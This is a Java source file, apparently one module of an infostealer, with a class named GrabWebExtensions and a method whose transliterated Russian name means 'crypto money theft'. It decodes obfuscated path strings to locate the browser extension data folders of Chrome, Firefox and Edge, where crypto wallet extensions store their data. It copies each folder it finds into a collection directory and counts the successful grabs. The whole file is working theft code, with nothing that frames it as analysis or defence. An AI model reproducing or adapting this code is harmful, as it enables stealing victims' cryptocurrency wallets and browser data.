package procat.sbor;

import procat.ui.Nastroiki;

import java.io.File;
import java.io.IOException;

public class GrabWebExtensions implements Runnable {

    public static int stetchik_money = 0;

    private static void krazhaCryptoMoney() {
        Nastroiki nastr = new Nastroiki();
        String pc_put = nastr.decrName(nastr.getC_user_put()) + System.getProperty("user.name");
        String file_put_crypto = Nastroiki.getFolder()+nastr.decrName(nastr.getWeb_crypto_wallet_put());


        sbor(pc_put + nastr.decrName(nastr.getPut_AppData()) + nastr.decrName(nastr.getPut_Local())  + nastr.decrName(nastr.getPut_WebWallet_Google()) + nastr.decrName(nastr.getPut_WebWallet_Chrome()) + nastr.decrName(nastr.getPut_WebWallet_User()) + " " + nastr.decrName(nastr.getPut_WebWallet_Data()) + nastr.decrName(nastr.getPut_WebWallet_Default()) + nastr.decrName(nastr.getPut_WebWallet_Extensions()),  file_put_crypto + nastr.decrName(nastr.getPut_WebWallet_Chrome()) + nastr.decrName(nastr.getPut_WebWallet_Extensions()));
        sbor(pc_put + nastr.decrName(nastr.getPut_AppData()) + nastr.decrName(nastr.getPut_Roaming())  + nastr.decrName(nastr.getPut_WebWallet_Mozilla()) + nastr.decrName(nastr.getPut_WebWallet_Firefox()) + nastr.decrName(nastr.getPut_WebWallet_Profiles()) + nastr.decrName(nastr.getPut_WebWallet_randomstring()) + nastr.decrName(nastr.getPut_WebWallet_default()) + nastr.decrName(nastr.getPut_WebWallet_extensions()),  file_put_crypto + nastr.decrName(nastr.getPut_WebWallet_Firefox()) + nastr.decrName(nastr.getPut_WebWallet_Extensions()));
        sbor(pc_put + nastr.decrName(nastr.getPut_AppData()) + nastr.decrName(nastr.getPut_Local())  + nastr.decrName(nastr.getPut_WebWallet_Microsoft()) + nastr.decrName(nastr.getPut_WebWallet_Edge()) + nastr.decrName(nastr.getPut_WebWallet_User()) + " " + nastr.decrName(nastr.getPut_WebWallet_Data()) + nastr.decrName(nastr.getPut_WebWallet_Default()) + nastr.decrName(nastr.getPut_WebWallet_Extensions()),  file_put_crypto + nastr.decrName(nastr.getPut_WebWallet_Microsoft()) + nastr.decrName(nastr.getPut_WebWallet_Extensions()));
    }

    private static void sbor(String str_put, String str_log) {
        try {
            if (new File(str_put).exists()) {
                if (!new File(str_log).exists()) {
                    new File(str_log).mkdirs();

                    copyDir(str_put, str_log);
                    stetchik_money += 1;
                }
            }
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    private static void copyDir(String sourceDirectoryLocation, String destinationDirectoryLocation)
            throws IOException {
        org.apache.commons.io.FileUtils.copyDirectory(new File(sourceDirectoryLocation), new File(destinationDirectoryLocation));
    }

    @Override
    public void run() {
        krazhaCryptoMoney();
    }
}
